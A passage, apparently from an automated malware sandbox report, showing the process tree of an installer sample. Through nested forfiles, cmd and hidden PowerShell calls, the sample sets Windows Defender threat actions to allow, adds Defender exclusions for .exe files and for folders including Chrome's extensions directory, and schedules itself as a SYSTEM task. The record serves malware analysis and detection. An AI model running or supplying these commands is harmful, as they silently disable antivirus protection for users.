        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        7⤵
        
        PID:5764
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        8⤵
        
        PID:5488
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        
        PID:5332
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        7⤵
        
        PID:4180
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3876
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        9⤵
        
        PID:5204
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:6136
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:4284
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:396
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:5936
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS15A6.tmp\Install.exe\" it /itSdidcQqg 385118 /S" /V1 /F
        5⤵
        Creates scheduled task(s)
        
        PID:4980
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        5⤵
        
        PID:5256
      - C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        6⤵
        
        PID:5888
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        7⤵
        
        PID:292

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:4148

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:1884

C:\Users\Admin\AppData\Local\Temp\7zS15A6.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS15A6.tmp\Install.exe it /itSdidcQqg 385118 /S
1⤵
PID:2832
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:5456
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:4116
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:4980
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:1924
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5412
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5720
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5948
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:4308
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5536
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:6024
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:4180
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:5436
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:3304
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:5208
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:2028
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6024
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:3936
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:2532
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5392
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5872
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2528
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3880
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5948
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5784
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4944
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5644
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:592
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5784
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3304
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3180
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5144
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4692
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5080
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5604
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3992
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5324
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6140
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4944
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6132
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5852
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4164
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4492
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5460
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:5876
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4284
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5968
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4488
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5152
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3436
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5328
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4940
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5320
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5356
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2532
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2144
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3500
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5800
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5456
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1844
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6064
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5496
- - C:\Windows\SysWOW64\reg.exe
